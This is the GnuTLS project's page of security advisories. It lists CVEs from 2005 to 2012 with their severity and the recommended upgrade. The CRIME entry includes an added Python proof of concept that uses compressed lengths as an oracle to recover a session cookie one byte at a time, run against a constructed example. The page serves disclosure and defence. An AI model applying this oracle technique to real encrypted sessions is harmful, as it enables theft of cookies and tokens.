
The GNU Transport Layer Security Library

  • About Security Advisories

    Although the core GnuTLS team does not have the resources to analyse the background and impact of security issues in depth, we do take security seriously. All known information on security incidents is collected and published on this page.

    Our idea is to turn the writing of security advisories into an open process where everyone can contribute. Everyone is invited to analyse the impact of discovered bugs and, of course, also to study the code for new bugs.

    All serious analysis of bugs will be posted on this page.

    If this level of support is inadequate for your needs, customized commercial support is available.

  • Reporting security problems

    Send non-public reports to the maintainers. All other reports should be sent to one of the mailing lists.

  • Advisories

    Each entry lists the advisory tag, the CVE or CERT identifier(s), the severity, and the available information: links to announcements, analyses and patches, followed by a recommendation.

    GNUTLS-SA-2012-4
    "CRIME" attack
    CVE-2012-4929
    Severity: Possible plaintext recovery

    There is an attack on TLS called "CRIME" which takes advantage of compression: an attacker who can observe the lengths of compressed-then-encrypted records, and who can repeatedly inject chosen data into the same session as a secret, may recover that secret under certain circumstances.

    Who is affected by this attack?

    • Clients or servers that use compression and allow an adversary to inject chosen data into their session, multiple times, alongside a secret such as a cookie or authentication token.

    How to mitigate the attack?

    • Do not enable compression (GnuTLS doesn't enable it by default; DEFLATE is only negotiated if the application explicitly requests it, e.g. with COMP-DEFLATE in its priority string).
    • When using compression, use the CBC ciphersuites, for which GnuTLS adds a random padding of up to 255 bytes to each record. This hides the exact compressed length and significantly increases the number of trials an attacker needs to perform.

    Note that using compression always provides some information to an attacker on the plaintext: the compressed length depends on the content, and encryption does not hide that length.
    Security advisory
    A description of the attack
    Another analysis of the attack
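    The length-oracle mechanism behind CRIME, as an added example (not code from the GnuTLS project or from this advisory). It models a compressed request with an attacker-chosen path and a secret cookie, measures the compressed size with Python's zlib as a stand-in for TLS DEFLATE compression, and recovers the cookie one byte at a time. The HTTP layout, the token value, the hex alphabet and the helper names are all constructed for the example. Two choices make the oracle exact rather than approximate: zlib's Z_FIXED strategy, so every literal and match has a known bit cost, and eight requests per guess with 0 to 7 bytes of unique high-byte padding, which shifts the final byte boundary through every alignment and so converts byte counts into a bit-exact score. With the dynamic Huffman codes that TLS implementations normally use, and with the random CBC padding mentioned above, each measurement is noisier and the attacker needs more trials, which is the effect the mitigation relies on.

```python
import zlib

# Constructed example: a session token the attacker wants to steal. The
# attacker never reads it directly; it only observes compressed lengths.
SECRET = b"7f3a9c2b1e"


def build_request(injected: bytes, pad: int) -> bytes:
    """Model the victim's request: attacker-chosen bytes in the path, the
    secret cookie later in the same compressed stream (hypothetical layout;
    real CRIME targets TLS- or SPDY-level compression of such requests)."""
    # Alignment padding: unique high bytes, each a 9-bit literal in the
    # fixed-Huffman DEFLATE code, and never part of an LZ77 match.
    padding = bytes(range(0x90, 0x90 + pad))
    return (b"GET /search?q=" + injected + padding + b" HTTP/1.1\r\n"
            b"Host: example.com\r\n"
            b"Cookie: sessionid=" + SECRET + b"\r\n\r\n")


def compressed_size(data: bytes) -> int:
    """Bytes of zlib output using fixed Huffman codes (Z_FIXED), so every
    literal and match has a fixed bit cost and the only variable is the LZ77
    parse. TLS-level DEFLATE normally uses dynamic codes, which add noise."""
    c = zlib.compressobj(6, zlib.DEFLATED, zlib.MAX_WBITS,
                         zlib.DEF_MEM_LEVEL, zlib.Z_FIXED)
    return len(c.compress(data) + c.flush())


def score(injected: bytes) -> int:
    """Length oracle. Summing over 8 padding lengths (each pad byte adds 9
    bits, so the byte boundary lands in every residue mod 8) turns byte
    counts into an exact bit count plus a constant: one more output bit
    means score + 1."""
    return sum(compressed_size(build_request(injected, pad)) for pad in range(8))


def recover_secret(prefix: bytes = b"sessionid=",
                   alphabet: bytes = b"0123456789abcdef",
                   max_len: int = 64) -> bytes:
    """CRIME-style byte-at-a-time recovery: the guess that extends the LZ77
    match of prefix+known by one byte compresses strictly smaller than every
    other guess. When no guess is uniquely smallest, the secret has ended."""
    known = b""
    while len(known) < max_len:
        scores = {c: score(prefix + known + bytes([c])) for c in alphabet}
        best = min(scores.values())
        winners = [c for c, s in scores.items() if s == best]
        if len(winners) != 1:
            break
        known += bytes(winners)
    return known


if __name__ == "__main__":
    recovered = recover_secret()
    print("recovered:", recovered.decode(), "correct:", recovered == SECRET)
```

    Run it directly to watch the token come back one hex digit per round; the stop condition (no uniquely smallest guess) is also how an attacker detects the end of the secret. The same oracle exists in any protocol that compresses attacker-influenced and secret data into one stream before encrypting it, which is why the safe choice is to leave compression disabled.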
    GNUTLS-SA-2012-3
    CVE-2012-1569
    Severity: Denial of service
    This vulnerability is in the libtasn1 library and affects DER length decoding; it is fixed in the libtasn1 2.12 release.
    Write-up by Mu Dynamics
    Recommendation: Upgrade to libtasn1 2.12.
    GNUTLS-SA-2012-2
    CVE-2012-1573
    Severity: Possible buffer overflow/Denial of service
    TLS record handling vulnerability, fixed in GnuTLS 3.0.15.
    Write-up by Mu Dynamics
    Recommendation: Upgrade to GnuTLS 3.0.17 or 2.12.18.
    GNUTLS-SA-2012-1
    CVE-2012-0390
    Severity: Timing attack (DTLS)
    Announcement of GnuTLS 3.0.11
    The paper describing the attack
    This vulnerability allows an attacker to perform partial plaintext recovery using a timing attack on CBC-mode encryption. The attack is applicable to Datagram TLS (DTLS).
    Recommendation: Upgrade to GnuTLS 3.0.11.
    GNUTLS-SA-2011-2
    CVE-2011-4128
    Severity: Possible buffer overflow/Denial of service
    Mailing list discussion
    Note that this vulnerability is triggered by TLS clients that use the session resumption functions in a particular way. Clients that perform session resumption following the same steps as the example code in the GnuTLS documentation are not vulnerable. A preliminary analysis found no vulnerable clients.
    Recommendation: Upgrade to GnuTLS 3.0.7 or 2.12.14.
    GNUTLS-SA-2011-1
    Rizzo attack on TLS (the "BEAST" attack by Rizzo and Duong)
    Severity: Plaintext recovery
    Mailing list discussion
    Recommendation: Make use of the TLS 1.1 or TLS 1.2 protocols, which are not vulnerable to the attack. TLS 1.1 is enabled by default in GnuTLS since version 2.0.0 (released in 2007). If this is not possible, disable CBC ciphers (in TLS 1.0 this leaves only the stream ciphers).
    GNUTLS-SA-2010-1
    CVE-2010-0731
    Severity: Remote Denial of Service
    RedHat bugzilla report
    Mailing list discussion

    This vulnerability is in a GnuTLS branch that has been deprecated since 2006. We keep the information here because this version was included in some distributions.
    Recommendation: Upgrade to the latest stable branch.

    GNUTLS-SA-2009-5
    CERT VU#120541
    CVE-2009-3555
    Severity: Plaintext injection attack (TLS renegotiation)
    Mailing list discussion

    Recommendation: Disable support for TLS renegotiation in application servers or, better, upgrade to GnuTLS 2.10.x, which implements the safe renegotiation extension (RFC 5746).

    GNUTLS-SA-2009-4
    CVE-2009-2730
    Severity: False positive in certificate hostname validation (a certificate can be accepted for a hostname it should not match)
    Announcement of v2.8.3 that solves the problem.
    Analysis of the vulnerability and minimal patch.
    How to check if your GnuTLS library is vulnerable.
    Back-ported patches for earlier releases: [1] [2]
    Recommendation: Upgrade to GnuTLS 2.8.3 or later.
    GNUTLS-SA-2009-3
    CVE-2009-1417
    Severity: No checking of certificate activation/expiration times
    Security advisory including patch
    Announcement of v2.6.6 that includes the patch.
    Recommendation: Upgrade to GnuTLS 2.6.6 or later. If you still use the 2.4.x branch or earlier branches, apply the patch.
    GNUTLS-SA-2009-2
    CVE-2009-1416
    Severity: GnuTLS 2.6.x DSA keys are corrupt
    Security advisory including patch
    Announcement of v2.6.6 that includes the patch.
    Recommendation: If you are using GnuTLS 2.6.x, upgrade to GnuTLS 2.6.6.
    GNUTLS-SA-2009-1
    CVE-2009-1415
    Severity: Double/invalid free in GnuTLS 2.6.x on certain errors
    Security advisory including patch
    Announcement of v2.6.6 that includes the patch.
    Recommendation: If you are using GnuTLS 2.6.x, upgrade to GnuTLS 2.6.6.
    GNUTLS-SA-2008-3
    CVE-2008-4989
    Severity: Remote X.509 trust chain validation error
    Announcement of v2.6.1 and patch
    Detailed analysis
    Announcement of v2.6.2 and updated patch.
    Announcement of updated patch and 2.6.3 release candidate.
    Announcement of v2.6.3.
    Announcement of v2.6.4 and v2.4.3.
    Recommendation: Upgrade to GnuTLS 2.6.4 or later or, if you still use the 2.4.x branch, to 2.4.3 or later.
    GNUTLS-SA-2008-2
    CVE-2008-2377
    Severity: Local denial of service (a hostile server may also be able to trigger the crash in GnuTLS clients; see the reports below)
    Announcement
    Detailed analysis and patch
    Another report that suggests it can be exploited by hostile servers
    Recommendation: Upgrade to GnuTLS 2.4.1 or apply the patch.
    GNUTLS-SA-2008-1
    CERT-FI announcement
    CVE-2008-1948, CVE-2008-1949, CVE-2008-1950
    Severity: Remote Denial of Service
    Announcement and Patch
    Updated announcement and Patch
    Recommendation: Upgrade to GnuTLS 2.2.5 or apply the patch in the second link.
    GNUTLS-SA-2006-4
    CVE-2006-4790 (via NVD)
    Severity: False positive in verifying signature (forged RSA signatures could be accepted)
    Announcement
    Updated patch
    Original report
    Recommendation: Upgrade to GnuTLS 1.4.4.
    GNUTLS-SA-2006-3
    Severity: None
    Announcement
    Bleichenbacher's Crypto 98 paper
    Recommendation: No action required; see the post where this advisory is essentially withdrawn.
    GNUTLS-SA-2006-2
    CVE-2006-7239
    Severity: Denial of service?
    Details
    Recommendation: Upgrade to GnuTLS 1.4.2.
    GNUTLS-SA-2006-1
    CVE-2006-0645
    Severity: Denial of service?
    Libtasn1 Announcement
    Recommendation: Upgrade to Libtasn1 0.2.18 and GnuTLS 1.2.10 (stable) or 1.3.4 (experimental).
    GNUTLS-SA-2005-1
    CVE-2005-1431
    Severity: Denial of service
    Announcement
    Write-up by Éric Leblond
    Recommendation: Upgrade to GnuTLS 1.0.25 or 1.2.3.
Please send FSF & GNU inquiries to gnu@gnu.org. There are also other ways to contact the FSF.
Please send broken links and other corrections or suggestions to bug-gnutls@gnu.org.

Copyright © 2011,2012 Free Software Foundation, Inc.

Verbatim copying and distribution of this entire article are permitted worldwide, without royalty, in any medium, provided this notice, and the copyright notice, are preserved.